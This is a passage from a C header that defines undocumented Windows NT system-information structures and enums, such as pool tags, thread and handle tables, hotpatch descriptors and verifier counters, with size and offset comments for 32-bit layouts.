UCHAR SecurityRequired; // Size=1 Offset=44
UCHAR WaitableObject; // Size=1 Offset=45
UNICODE_STRING TypeName; // Size=8 Offset=48
};
typedef struct _OBJECT_NAME_INFORMATION // Size=8
{
UNICODE_STRING Name; // Size=8 Offset=0
} OBJECT_NAME_INFORMATION;
struct _SYSTEM_OBJECT_INFORMATION // Size=48
{
ULONG NextEntryOffset; // Size=4 Offset=0
PVOID Object; // Size=4 Offset=4
PVOID CreatorUniqueProcess; // Size=4 Offset=8
USHORT CreatorBackTraceIndex; // Size=2 Offset=12
USHORT Flags; // Size=2 Offset=14
LONG PointerCount; // Size=4 Offset=16
LONG HandleCount; // Size=4 Offset=20
ULONG PagedPoolCharge; // Size=4 Offset=24
ULONG NonPagedPoolCharge; // Size=4 Offset=28
PVOID ExclusiveProcessId; // Size=4 Offset=32
PVOID SecurityDescriptor; // Size=4 Offset=36
OBJECT_NAME_INFORMATION NameInfo; // Size=8 Offset=40
};
struct _SYSTEM_PAGEFILE_INFORMATION // Size=24
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG TotalSize; // Size=4 Offset=4
ULONG TotalInUse; // Size=4 Offset=8
ULONG PeakUsage; // Size=4 Offset=12
UNICODE_STRING PageFileName; // Size=8 Offset=16
};
struct _SYSTEM_VDM_INSTEMUL_INFO // Size=136
{
ULONG SegmentNotPresent; // Size=4 Offset=0
ULONG VdmOpcode0F; // Size=4 Offset=4
ULONG OpcodeESPrefix; // Size=4 Offset=8
ULONG OpcodeCSPrefix; // Size=4 Offset=12
ULONG OpcodeSSPrefix; // Size=4 Offset=16
ULONG OpcodeDSPrefix; // Size=4 Offset=20
ULONG OpcodeFSPrefix; // Size=4 Offset=24
ULONG OpcodeGSPrefix; // Size=4 Offset=28
ULONG OpcodeOPER32Prefix; // Size=4 Offset=32
ULONG OpcodeADDR32Prefix; // Size=4 Offset=36
ULONG OpcodeINSB; // Size=4 Offset=40
ULONG OpcodeINSW; // Size=4 Offset=44
ULONG OpcodeOUTSB; // Size=4 Offset=48
ULONG OpcodeOUTSW; // Size=4 Offset=52
ULONG OpcodePUSHF; // Size=4 Offset=56
ULONG OpcodePOPF; // Size=4 Offset=60
ULONG OpcodeINTnn; // Size=4 Offset=64
ULONG OpcodeINTO; // Size=4 Offset=68
ULONG OpcodeIRET; // Size=4 Offset=72
ULONG OpcodeINBimm; // Size=4 Offset=76
ULONG OpcodeINWimm; // Size=4 Offset=80
ULONG OpcodeOUTBimm; // Size=4 Offset=84
ULONG OpcodeOUTWimm; // Size=4 Offset=88
ULONG OpcodeINB; // Size=4 Offset=92
ULONG OpcodeINW; // Size=4 Offset=96
ULONG OpcodeOUTB; // Size=4 Offset=100
ULONG OpcodeOUTW; // Size=4 Offset=104
ULONG OpcodeLOCKPrefix; // Size=4 Offset=108
ULONG OpcodeREPNEPrefix; // Size=4 Offset=112
ULONG OpcodeREPPrefix; // Size=4 Offset=116
ULONG OpcodeHLT; // Size=4 Offset=120
ULONG OpcodeCLI; // Size=4 Offset=124
ULONG OpcodeSTI; // Size=4 Offset=128
ULONG BopCount; // Size=4 Offset=132
};
struct _SYSTEM_FILECACHE_INFORMATION // Size=36
{
ULONG CurrentSize; // Size=4 Offset=0
ULONG PeakSize; // Size=4 Offset=4
ULONG PageFaultCount; // Size=4 Offset=8
ULONG MinimumWorkingSet; // Size=4 Offset=12
ULONG MaximumWorkingSet; // Size=4 Offset=16
ULONG CurrentSizeIncludingTransitionInPages; // Size=4 Offset=20
ULONG PeakSizeIncludingTransitionInPages; // Size=4 Offset=24
ULONG TransitionRePurposeCount; // Size=4 Offset=28
ULONG Flags; // Size=4 Offset=32
};
typedef struct _SYSTEM_POOLTAG // Size=28
{
UCHAR Tag[4]; // Size=4 Offset=0
ULONG PagedAllocs; // Size=4 Offset=4
ULONG PagedFrees; // Size=4 Offset=8
ULONG PagedUsed; // Size=4 Offset=12
ULONG NonPagedAllocs; // Size=4 Offset=16
ULONG NonPagedFrees; // Size=4 Offset=20
ULONG NonPagedUsed; // Size=4 Offset=24
} SYSTEM_POOLTAG;
struct _SYSTEM_POOLTAG_INFORMATION // Size=32
{
ULONG Count; // Size=4 Offset=0
SYSTEM_POOLTAG TagInfo[1]; // Size=28 Offset=4
};
struct _SYSTEM_INTERRUPT_INFORMATION // Size=24
{
ULONG ContextSwitches; // Size=4 Offset=0
ULONG DpcCount; // Size=4 Offset=4
ULONG DpcRate; // Size=4 Offset=8
ULONG TimeIncrement; // Size=4 Offset=12
ULONG DpcBypassCount; // Size=4 Offset=16
ULONG ApcBypassCount; // Size=4 Offset=20
};
struct _SYSTEM_DPC_BEHAVIOR_INFORMATION // Size=20
{
ULONG Spare; // Size=4 Offset=0
ULONG DpcQueueDepth; // Size=4 Offset=4
ULONG MinimumDpcRate; // Size=4 Offset=8
ULONG AdjustDpcThreshold; // Size=4 Offset=12
ULONG IdealDpcRate; // Size=4 Offset=16
};
typedef struct _IMAGE_EXPORT_DIRECTORY // Size=40
{
ULONG Characteristics; // Size=4 Offset=0
ULONG TimeDateStamp; // Size=4 Offset=4
USHORT MajorVersion; // Size=2 Offset=8
USHORT MinorVersion; // Size=2 Offset=10
ULONG Name; // Size=4 Offset=12
ULONG Base; // Size=4 Offset=16
ULONG NumberOfFunctions; // Size=4 Offset=20
ULONG NumberOfNames; // Size=4 Offset=24
ULONG AddressOfFunctions; // Size=4 Offset=28
ULONG AddressOfNames; // Size=4 Offset=32
ULONG AddressOfNameOrdinals; // Size=4 Offset=36
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
struct _SYSTEM_LOADED_GDI_DRIVER_INFORMATION // Size=28
{
UNICODE_STRING DriverName; // Size=8 Offset=0
PVOID ImageAddress; // Size=4 Offset=8
PVOID SectionPointer; // Size=4 Offset=12
PVOID EntryPoint; // Size=4 Offset=16
PIMAGE_EXPORT_DIRECTORY ExportSectionPointer; // Size=4 Offset=20
ULONG ImageLength; // Size=4 Offset=24
};
struct _SYSTEM_UNLOADED_GDI_DRIVER_INFORMATION // Size=28
{
PVOID ImageAddress; // Size=4 Offset=0
};
struct _SYSTEM_CRASH_DUMP_INFORMATION
{
HANDLE CrashDumpSectionHandle; // Size=4 Offset=0
};
struct _SYSTEM_EXCEPTION_INFORMATION // Size=16
{
ULONG AlignmentFixupCount; // Size=4 Offset=0
ULONG ExceptionDispatchCount; // Size=4 Offset=4
ULONG FloatingEmulationCount; // Size=4 Offset=8
ULONG ByteWordEmulationCount; // Size=4 Offset=12
};
typedef enum _SYSTEM_CRASH_DUMP_CONFIGURATION_CLASS
{
SystemCrashDumpDisable=0,
SystemCrashDumpReconfigure=1,
SystemCrashDumpInitializationComplete=2
} SYSTEM_CRASH_DUMP_CONFIGURATION_CLASS;
struct _SYSTEM_CRASH_DUMP_STATE_INFORMATION // Size=4
{
SYSTEM_CRASH_DUMP_CONFIGURATION_CLASS CrashDumpConfigurationClass; // Size=4 Offset=0
};
struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION // Size=2
{
UCHAR KernelDebuggerEnabled; // Size=1 Offset=0
UCHAR KernelDebuggerNotPresent; // Size=1 Offset=1
};
struct _SYSTEM_PRIORITY_SEPARATION
{
ULONG PrioritySeparation; // Size=4 Offset=0
};
typedef struct _SYSTEMTIME {
WORD wYear; // Size=2 Offset=0
WORD wMonth; // Size=2 Offset=2
WORD wDayOfWeek; // Size=2 Offset=4
WORD wDay; // Size=2 Offset=6
WORD wHour; // Size=2 Offset=8
WORD wMinute; // Size=2 Offset=10
WORD wSecond; // Size=2 Offset=12
WORD wMilliseconds; // Size=2 Offset=14
} SYSTEMTIME;
struct _SYSTEM_TIME_ZONE_INFORMATION
{
LONG Bias;
WCHAR StandardName[32];
SYSTEMTIME StandardDate;
LONG StandardBias;
WCHAR DaylightName[32];
SYSTEMTIME DaylightDate;
LONG DaylightBias;
};
struct _SYSTEM_CONTEXT_SWITCH_INFORMATION // Size=48
{
ULONG ContextSwitches; // Size=4 Offset=0
ULONG FindAny; // Size=4 Offset=4
ULONG FindLast; // Size=4 Offset=8
ULONG FindIdeal; // Size=4 Offset=12
ULONG IdleAny; // Size=4 Offset=16
ULONG IdleCurrent; // Size=4 Offset=20
ULONG IdleLast; // Size=4 Offset=24
ULONG IdleIdeal; // Size=4 Offset=28
ULONG PreemptAny; // Size=4 Offset=32
ULONG PreemptCurrent; // Size=4 Offset=36
ULONG PreemptLast; // Size=4 Offset=40
ULONG SwitchToIdle; // Size=4 Offset=44
};
struct _SYSTEM_REGISTRY_QUOTA_INFORMATION // Size=12
{
ULONG RegistryQuotaAllowed; // Size=4 Offset=0
ULONG RegistryQuotaUsed; // Size=4 Offset=4
ULONG PagedPoolSize; // Size=4 Offset=8
};
struct _SYSTEM_PROCESSOR_IDLE_INFORMATION // Size=48
{
ULONGLONG IdleTime; // Size=8 Offset=0
ULONGLONG C1Time; // Size=8 Offset=8
ULONGLONG C2Time; // Size=8 Offset=16
ULONGLONG C3Time; // Size=8 Offset=24
ULONG C1Transitions; // Size=4 Offset=32
ULONG C2Transitions; // Size=4 Offset=36
ULONG C3Transitions; // Size=4 Offset=40
ULONG Padding; // Size=4 Offset=44
};
struct _SYSTEM_LEGACY_DRIVER_INFORMATION // Size=12
{
ULONG VetoType; // Size=4 Offset=0
UNICODE_STRING VetoList; // Size=8 Offset=4
};
typedef enum _POOL_TYPE {
NonPagedPool,
NonPagedPoolExecute = NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed = NonPagedPool + 2,
DontUseThisType,
NonPagedPoolCacheAligned = NonPagedPool + 4,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
MaxPoolType,
NonPagedPoolBase = 0,
NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
NonPagedPoolSession = 32,
PagedPoolSession = NonPagedPoolSession + 1,
NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
NonPagedPoolNx = 512,
NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
NonPagedPoolSessionNx = NonPagedPoolNx + 32
} POOL_TYPE;
struct _SYSTEM_LOOKASIDE_INFORMATION // Size=32
{
USHORT CurrentDepth; // Size=2 Offset=0
USHORT MaximumDepth; // Size=2 Offset=2
ULONG TotalAllocates; // Size=4 Offset=4
ULONG AllocateMisses; // Size=4 Offset=8
ULONG TotalFrees; // Size=4 Offset=12
ULONG FreeMisses; // Size=4 Offset=16
POOL_TYPE Type; // Size=4 Offset=20
ULONG Tag; // Size=4 Offset=24
ULONG Size; // Size=4 Offset=28
};
struct _SYSTEM_SET_TIME_SLIP_EVENT
{
HANDLE TimeSlipEvent;
};
struct _SYSTEM_SESSION
{
ULONG SessionId;
};
struct _SYSTEM_RANGE_START_INFORMATION
{
PVOID SystemRangeStart;
};
typedef struct _SYSTEM_VERIFIER_INFORMATION // Size=104
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG Level; // Size=4 Offset=4
UNICODE_STRING DriverName; // Size=8 Offset=8
ULONG RaiseIrqls; // Size=4 Offset=16
ULONG AcquireSpinLocks; // Size=4 Offset=20
ULONG SynchronizeExecutions; // Size=4 Offset=24
ULONG AllocationsAttempted; // Size=4 Offset=28
ULONG AllocationsSucceeded; // Size=4 Offset=32
ULONG AllocationsSucceededSpecialPool; // Size=4 Offset=36
ULONG AllocationsWithNoTag; // Size=4 Offset=40
ULONG TrimRequests; // Size=4 Offset=44
ULONG Trims; // Size=4 Offset=48
ULONG AllocationsFailed; // Size=4 Offset=52
ULONG AllocationsFailedDeliberately; // Size=4 Offset=56
ULONG Loads; // Size=4 Offset=60
ULONG Unloads; // Size=4 Offset=64
ULONG UnTrackedPool; // Size=4 Offset=68
ULONG CurrentPagedPoolAllocations; // Size=4 Offset=72
ULONG CurrentNonPagedPoolAllocations; // Size=4 Offset=76
ULONG PeakPagedPoolAllocations; // Size=4 Offset=80
ULONG PeakNonPagedPoolAllocations; // Size=4 Offset=84
ULONG PagedPoolUsageInBytes; // Size=4 Offset=88
ULONG NonPagedPoolUsageInBytes; // Size=4 Offset=92
ULONG PeakPagedPoolUsageInBytes; // Size=4 Offset=96
ULONG PeakNonPagedPoolUsageInBytes; // Size=4 Offset=100
} SYSTEM_VERIFIER_INFORMATION;
struct _SYSTEM_SESSION_PROCESS_INFORMATION // Size=12
{
ULONG SessionId; // Size=4 Offset=0
ULONG SizeOfBuf; // Size=4 Offset=4
PVOID Buffer; // Size=4 Offset=8
};
typedef struct _SYSTEM_POOL_BLOCK
{
BOOLEAN Allocated;
USHORT Unknown;
ULONG Size;
CHAR Tag[4];
} SYSTEM_POOL_BLOCK;
struct _SYSTEM_POOL_BLOCKS_INFORMATION
{
ULONG PoolSize;
PVOID PoolBase;
USHORT PoolAlignment;
ULONG NumberOfBlocks;
SYSTEM_POOL_BLOCK PoolBlocks[1];
};
typedef struct _SYSTEM_MEMORY_USAGE
{
PVOID Name;
USHORT Valid;
USHORT Standby;
USHORT Modified;
USHORT PageTables;
} SYSTEM_MEMORY_USAGE;
struct _SYSTEM_MEMORY_USAGE_INFORMATION
{
ULONG Reserved;
PVOID EndOfData;
SYSTEM_MEMORY_USAGE MemoryUsage[1];
};
typedef struct _CLIENT_ID // Size=8
{
PVOID UniqueProcess; // Size=4 Offset=0
PVOID UniqueThread; // Size=4 Offset=4
} CLIENT_ID;
typedef struct _SYSTEM_THREAD_INFORMATION // Size=64
{
LARGE_INTEGER KernelTime; // Size=8 Offset=0
LARGE_INTEGER UserTime; // Size=8 Offset=8
LARGE_INTEGER CreateTime; // Size=8 Offset=16
ULONG WaitTime; // Size=4 Offset=24
PVOID StartAddress; // Size=4 Offset=28
CLIENT_ID ClientId; // Size=8 Offset=32
LONG Priority; // Size=4 Offset=40
LONG BasePriority; // Size=4 Offset=44
ULONG ContextSwitches; // Size=4 Offset=48
ULONG ThreadState; // Size=4 Offset=52
ULONG WaitReason; // Size=4 Offset=56
} SYSTEM_THREAD_INFORMATION;
typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION // Size=96
{
SYSTEM_THREAD_INFORMATION ThreadInfo; // Size=64 Offset=0
PVOID StackBase; // Size=4 Offset=64
PVOID StackLimit; // Size=4 Offset=68
PVOID Win32StartAddress; // Size=4 Offset=72
PVOID TebBase; // Size=4 Offset=76
ULONG Reserved2; // Size=4 Offset=80
ULONG Reserved3; // Size=4 Offset=84
ULONG Reserved4; // Size=4 Offset=88
} SYSTEM_EXTENDED_THREAD_INFORMATION;
// I have not validated this structure
struct _SYSTEM_EXTENDED_PROCESS_INFORMATION
{
SYSTEM_PROCESS_INFORMATION ProcessInfo;
SYSTEM_EXTENDED_THREAD_INFORMATION ThreadInfo;
};
struct _SYSTEM_PROCESSOR_POWER_INFORMATION // Size=72
{
UCHAR CurrentFrequency; // Size=1 Offset=0
UCHAR ThermalLimitFrequency; // Size=1 Offset=1
UCHAR ConstantThrottleFrequency; // Size=1 Offset=2
UCHAR DegradedThrottleFrequency; // Size=1 Offset=3
UCHAR LastBusyFrequency; // Size=1 Offset=4
UCHAR LastC3Frequency; // Size=1 Offset=5
UCHAR LastAdjustedBusyFrequency; // Size=1 Offset=6
UCHAR ProcessorMinThrottle; // Size=1 Offset=7
UCHAR ProcessorMaxThrottle; // Size=1 Offset=8
ULONG NumberOfFrequencies; // Size=4 Offset=12
ULONG PromotionCount; // Size=4 Offset=16
ULONG DemotionCount; // Size=4 Offset=20
ULONG ErrorCount; // Size=4 Offset=24
ULONG RetryCount; // Size=4 Offset=28
ULONGLONG CurrentFrequencyTime; // Size=8 Offset=32
ULONGLONG CurrentProcessorTime; // Size=8 Offset=40
ULONGLONG CurrentProcessorIdleTime; // Size=8 Offset=48
ULONGLONG LastProcessorTime; // Size=8 Offset=56
ULONGLONG LastProcessorIdleTime; // Size=8 Offset=64
};
struct SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX // Size=28
{
PVOID Object; // Size=4 Offset=0
ULONG UniqueProcessId; // Size=4 Offset=4
ULONG HandleValue; // Size=4 Offset=8
ULONG GrantedAccess; // Size=4 Offset=12
USHORT CreatorBackTraceIndex; // Size=2 Offset=16
USHORT ObjectTypeIndex; // Size=2 Offset=18
ULONG HandleAttributes; // Size=4 Offset=20
ULONG Reserved; // Size=4 Offset=24
};
struct _SYSTEM_HANDLE_INFORMATION_EX // Size=36
{
ULONG NumberOfHandles; // Size=4 Offset=0
ULONG Reserved; // Size=4 Offset=4
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; // Size=36 Offset=8
};
typedef struct _SYSTEM_BIGPOOL_ENTRY // Size=12
{
PVOID VirtualAddress; // Size=4 Offset=0
ULONG SizeInBytes; // Size=4 Offset=4
UCHAR Tag[4]; // Size=4 Offset=8
} SYSTEM_BIGPOOL_ENTRY;
struct _SYSTEM_BIGPOOL_INFORMATION // Size=16
{
ULONG Count; // Size=4 Offset=0
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1]; // Size=12 Offset=4
};
struct _SYSTEM_SESSION_POOLTAG_INFORMATION // Size=40
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG SessionId; // Size=4 Offset=4
ULONG Count; // Size=4 Offset=8
SYSTEM_POOLTAG TagInfo[1]; // Size=28 Offset=12
};
struct _SYSTEM_SESSION_MAPPED_VIEW_INFORMATION // Size=20
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG SessionId; // Size=4 Offset=4
ULONG ViewFailures; // Size=4 Offset=8
ULONG NumberOfBytesAvailable; // Size=4 Offset=12
ULONG NumberOfBytesAvailableContiguous; // Size=4 Offset=16
};
typedef struct _HOTPATCH_HOOK_DESCRIPTOR // Size=40
{
ULONGLONG TargetAddress; // Size=8 Offset=0
ULONGLONG MappedAddress; // Size=8 Offset=8
ULONG CodeOffset; // Size=4 Offset=16
ULONG CodeSize; // Size=4 Offset=20
ULONG OrigCodeOffset; // Size=4 Offset=24
ULONG ValidationOffset; // Size=4 Offset=28
ULONG ValidationSize; // Size=4 Offset=32
} HOTPATCH_HOOK_DESCRIPTOR;
struct _SYSTEM_HOTPATCH_CODE_INFORMATION_KERNEL_INFO // Size=4
{
USHORT NameOffset; // Size=2 Offset=0
USHORT NameLength; // Size=2 Offset=2
};
struct _SYSTEM_HOTPATCH_CODE_INFORMATION_USERMODE_INFO // Size=14
{
USHORT NameOffset; // Size=2 Offset=0
USHORT NameLength; // Size=2 Offset=2
USHORT TargetNameOffset; // Size=2 Offset=4
USHORT TargetNameLength; // Size=2 Offset=6
USHORT ColdpatchImagePathOffset; // Size=2 Offset=8
USHORT ColdpatchImagePathLength; // Size=2 Offset=10
UCHAR PatchingFinished; // Size=1 Offset=12
};
struct _SYSTEM_HOTPATCH_CODE_INFORMATION_INJECTION_INFO // Size=24
{
USHORT NameOffset; // Size=2 Offset=0
USHORT NameLength; // Size=2 Offset=2
USHORT TargetNameOffset; // Size=2 Offset=4
USHORT TargetNameLength; // Size=2 Offset=6
USHORT ColdpatchImagePathOffset; // Size=2 Offset=8
USHORT ColdpatchImagePathLength; // Size=2 Offset=10
ULONGLONG TargetProcess; // Size=8 Offset=16
};
struct _SYSTEM_HOTPATCH_CODE_INFORMATION_ATOMIC_SWAP // Size=24
{
ULONGLONG ParentDirectory; // Size=8 Offset=0
ULONGLONG ObjectHandle1; // Size=8 Offset=8
ULONGLONG ObjectHandle2; // Size=8 Offset=16
};
struct _SYSTEM_HOTPATCH_CODE_INFORMATION_CODE_INFO // Size=48
{
ULONG DescriptorsCount; // Size=4 Offset=0
HOTPATCH_HOOK_DESCRIPTOR CodeDescriptors[1]; // Size=40 Offset=8
};
typedef enum _WATCHDOG_INFORMATION_CLASS
{
WdInfoTimeoutValue=0,
WdInfoResetTimer=1,
WdInfoStopTimer=2,
WdInfoStartTimer=3,
WdInfoTriggerAction=4,
WdInfoState=5
} WATCHDOG_INFORMATION_CLASS;
struct _SYSTEM_WATCHDOG_TIMER_INFORMATION // Size=8
{
WATCHDOG_INFORMATION_CLASS WdInfoClass; // Size=4 Offset=0
ULONG DataValue; // Size=4 Offset=4
};
struct _SYSTEM_LOGICAL_PROCESSOR_INFORMATION_PROCESSOR_CORE // Size=1
{
UCHAR Flags; // Size=1 Offset=0
};
struct _SYSTEM_LOGICAL_PROCESSOR_INFORMATION_NUMA_CODE // Size=4
{
ULONG NodeNumber; // Size=4 Offset=0
};
typedef enum _PROCESSOR_CACHE_TYPE
{
CacheUnified=0,
CacheInstruction=1,
CacheData=2,
CacheTrace=3
} PROCESSOR_CACHE_TYPE;
typedef enum _LOGICAL_PROCESSOR_RELATIONSHIP
{
RelationProcessorCore=0,
RelationNumaNode=1,
RelationCache=2,
RelationProcessorPackage=3,
RelationGroup=4,
RelationAll=65535
} LOGICAL_PROCESSOR_RELATIONSHIP;
struct _CACHE_DESCRIPTOR // Size=12
{
UCHAR Level; // Size=1 Offset=0
UCHAR Associativity; // Size=1 Offset=1
USHORT LineSize; // Size=2 Offset=2
ULONG Size; // Size=4 Offset=4
PROCESSOR_CACHE_TYPE Type; // Size=4 Offset=8
};
struct _SYSTEM_LOGICAL_PROCESSOR_INFORMATION // Size=24
{
ULONG ProcessorMask; // Size=4 Offset=0
LOGICAL_PROCESSOR_RELATIONSHIP Relationship; // Size=4 Offset=4
union
{
_SYSTEM_LOGICAL_PROCESSOR_INFORMATION_PROCESSOR_CORE; // Size=1 Offset=8
_SYSTEM_LOGICAL_PROCESSOR_INFORMATION_NUMA_CODE NumaNode; // Size=4 Offset=8
_CACHE_DESCRIPTOR Cache; // Size=12 Offset=8
ULONGLONG Reserved[2]; // Size=16 Offset=8
};
};
typedef enum _SYSTEM_FIRMWARE_TABLE_ACTION
{
SystemFirmwareTable_Enumerate=0,
SystemFirmwareTable_Get=1
} SYSTEM_FIRMWARE_TABLE_ACTION;
struct _SYSTEM_FIRMWARE_TABLE_INFORMATION // Size=20
{
ULONG ProviderSignature; // Size=4 Offset=0
SYSTEM_FIRMWARE_TABLE_ACTION Action; // Size=4 Offset=4
ULONG TableID; // Size=4 Offset=8
ULONG TableBufferLength; // Size=4 Offset=12
UCHAR TableBuffer[1]; // Size=1 Offset=16
};
struct _SYSTEM_VERIFIER_TRIAGE_INFORMATION // Size=544
{
ULONG ActionTaken; // Size=4 Offset=0
ULONG CrashData[5]; // Size=20 Offset=4
ULONG VerifierMode; // Size=4 Offset=24
ULONG VerifierFlags; // Size=4 Offset=28
WCHAR VerifierTargets[256]; // Size=512 Offset=32
};
struct _SYSTEM_MEMORY_LIST_INFORMATION // Size=88
{
ULONG ZeroPageCount; // Size=4 Offset=0
ULONG FreePageCount; // Size=4 Offset=4
ULONG ModifiedPageCount; // Size=4 Offset=8
ULONG ModifiedNoWritePageCount; // Size=4 Offset=12
ULONG BadPageCount; // Size=4 Offset=16
ULONG PageCountByPriority[8]; // Size=32 Offset=20
ULONG RepurposedPagesByPriority[8]; // Size=32 Offset=52
ULONG ModifiedPageCountPageFile; // Size=4 Offset=84
};
struct _SYSTEM_THREAD_CID_PRIORITY_INFORMATION // Size=12
{
CLIENT_ID ClientId; // Size=8 Offset=0
LONG Priority; // Size=4 Offset=8
};
struct _SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION // Size=8
{
ULONGLONG CycleTime; // Size=8 Offset=0
};
typedef struct _SYSTEM_VERIFIER_ISSUE // Size=16
{
ULONG IssueType; // Size=4 Offset=0
PVOID Address; // Size=4 Offset=4
ULONG Parameters[2]; // Size=8 Offset=8
} SYSTEM_VERIFIER_ISSUE;
struct _SYSTEM_VERIFIER_CANCELLATION_INFORMATION // Size=2068
{
ULONG CancelProbability; // Size=4 Offset=0
ULONG CancelThreshold; // Size=4 Offset=4
ULONG CompletionThreshold; // Size=4 Offset=8
ULONG CancellationVerifierDisabled; // Size=4 Offset=12
ULONG AvailableIssues; // Size=4 Offset=16
SYSTEM_VERIFIER_ISSUE Issues[128]; // Size=2048 Offset=20
};
struct _SYSTEM_REF_TRACE_INFORMATION // Size=20
{
UCHAR TraceEnable; // Size=1 Offset=0
UCHAR TracePermanent; // Size=1 Offset=1
UNICODE_STRING TraceProcessName; // Size=8 Offset=4
UNICODE_STRING TracePoolTags; // Size=8 Offset=12
};
struct _SYSTEM_SPECIAL_POOL_INFORMATION // Size=8
{
ULONG PoolTag; // Size=4 Offset=0
ULONG Flags; // Size=4 Offset=4
};
struct _SYSTEM_PROCESS_ID_INFORMATION // Size=12
{
PVOID ProcessId; // Size=4 Offset=0
UNICODE_STRING ImageName; // Size=8 Offset=4
};
typedef struct _GUID // Size=16
{
ULONG Data1; // Size=4 Offset=0
USHORT Data2; // Size=2 Offset=4
USHORT Data3; // Size=2 Offset=6
UCHAR Data4[8]; // Size=8 Offset=8
} GUID;
typedef enum _FIRMWARE_TYPE
{
FirmwareTypeUnknown=0,
FirmwareTypeBios=1,
FirmwareTypeUefi=2,
FirmwareTypeMax=3
} FIRMWARE_TYPE;
struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION // Size=32
{
GUID BootIdentifier; // Size=16 Offset=0
FIRMWARE_TYPE FirmwareType; // Size=4 Offset=16
ULONGLONG BootFlags; // Size=8 Offset=24
};
struct _SYSTEM_VERIFIER_INFORMATION_EX // Size=36
{
ULONG VerifyMode; // Size=4 Offset=0
ULONG OptionChanges; // Size=4 Offset=4
UNICODE_STRING PreviousBucketName; // Size=8 Offset=8
ULONG IrpCancelTimeoutMsec; // Size=4 Offset=16
ULONG VerifierExtensionEnabled; // Size=4 Offset=20
ULONG Reserved[3]; // Size=12 Offset=24
};
struct _SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION // Size=8
{
ULONG FlagsToEnable; // Size=4 Offset=0
ULONG FlagsToDisable; // Size=4 Offset=4
};
struct _SYSTEM_PREFETCH_PATCH_INFORMATION // Size=4
{
ULONG PrefetchPatchCount; // Size=4 Offset=0
};
struct _SYSTEM_VERIFIER_FAULTS_INFORMATION // Size=24
{
ULONG Probability; // Size=4 Offset=0
ULONG MaxProbability; // Size=4 Offset=4
UNICODE_STRING PoolTags; // Size=8 Offset=8
UNICODE_STRING Applications; // Size=8 Offset=16
};
struct _SYSTEM_SYSTEM_PARTITION_INFORMATION // Size=8
{
UNICODE_STRING SystemPartition; // Size=8 Offset=0
};
struct _SYSTEM_SYSTEM_DISK_INFORMATION // Size=8
{
UNICODE_STRING SystemDisk; // Size=8 Offset=0
};
struct _SYSTEM_CODEINTEGRITY_INFORMATION // Size=8
{
ULONG Length; // Size=4 Offset=0
ULONG CodeIntegrityOptions; // Size=4 Offset=4
};
struct _SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION // Size=4
{
ULONG Operation; // Size=4 Offset=0
};
struct _SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION // Size=8
{
ULONGLONG CycleTime; // Size=8 Offset=0
};
struct _SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // Size=36
{
PVOID KeyHandle; // Size=4 Offset=0
PUNICODE_STRING ValueNamePointer; // Size=4 Offset=4
ULONG_PTR RequiredLengthPointer; // Size=4 Offset=8
PUCHAR Buffer; // Size=4 Offset=12
ULONG BufferLength; // Size=4 Offset=16
ULONG Type; // Size=4 Offset=20
PUCHAR AppendBuffer; // Size=4 Offset=24
ULONG AppendBufferLength; // Size=4 Offset=28
UCHAR CreateIfDoesntExist; // Size=1 Offset=32
UCHAR TruncateExistingValue; // Size=1 Offset=33
};
struct _SYSTEM_VHD_BOOT_INFORMATION // Size=12
{
UCHAR OsDiskIsVhd; // Size=1 Offset=0
ULONG OsVhdFilePathOffset; // Size=4 Offset=4
WCHAR OsVhdParentVolume[1]; // Size=2 Offset=8
};
struct _SYSTEM_ERROR_PORT_TIMEOUTS // Size=8
{
ULONG StartTimeout; // Size=4 Offset=0
ULONG CommTimeout; // Size=4 Offset=4
};
struct _SYSTEM_LOW_PRIORITY_IO_INFORMATION // Size=40
{
ULONG LowPriReadOperations; // Size=4 Offset=0
ULONG LowPriWriteOperations; // Size=4 Offset=4
ULONG KernelBumpedToNormalOperations; // Size=4 Offset=8
ULONG LowPriPagingReadOperations; // Size=4 Offset=12
ULONG KernelPagingReadsBumpedToNormal; // Size=4 Offset=16
ULONG LowPriPagingWriteOperations; // Size=4 Offset=20
ULONG KernelPagingWritesBumpedToNormal; // Size=4 Offset=24
ULONG BoostedIrpCount; // Size=4 Offset=28
ULONG BoostedPagingIrpCount; // Size=4 Offset=32
ULONG BlanketBoostCount; // Size=4 Offset=36
};
struct _SYSTEM_VERIFIER_COUNTERS_INFORMATION // Size=168
{
SYSTEM_VERIFIER_INFORMATION Legacy; // Size=104 Offset=0
ULONG RaiseIrqls; // Size=4 Offset=104
ULONG AcquireSpinLocks; // Size=4 Offset=108
ULONG SynchronizeExecutions; // Size=4 Offset=112
ULONG AllocationsWithNoTag; // Size=4 Offset=116
ULONG AllocationsFailed; // Size=4 Offset=120
ULONG AllocationsFailedDeliberately; // Size=4 Offset=124
ULONG LockedBytes; // Size=4 Offset=128
ULONG PeakLockedBytes; // Size=4 Offset=132
ULONG MappedLockedBytes; // Size=4 Offset=136
ULONG PeakMappedLockedBytes; // Size=4 Offset=140
ULONG MappedIoSpaceBytes; // Size=4 Offset=144
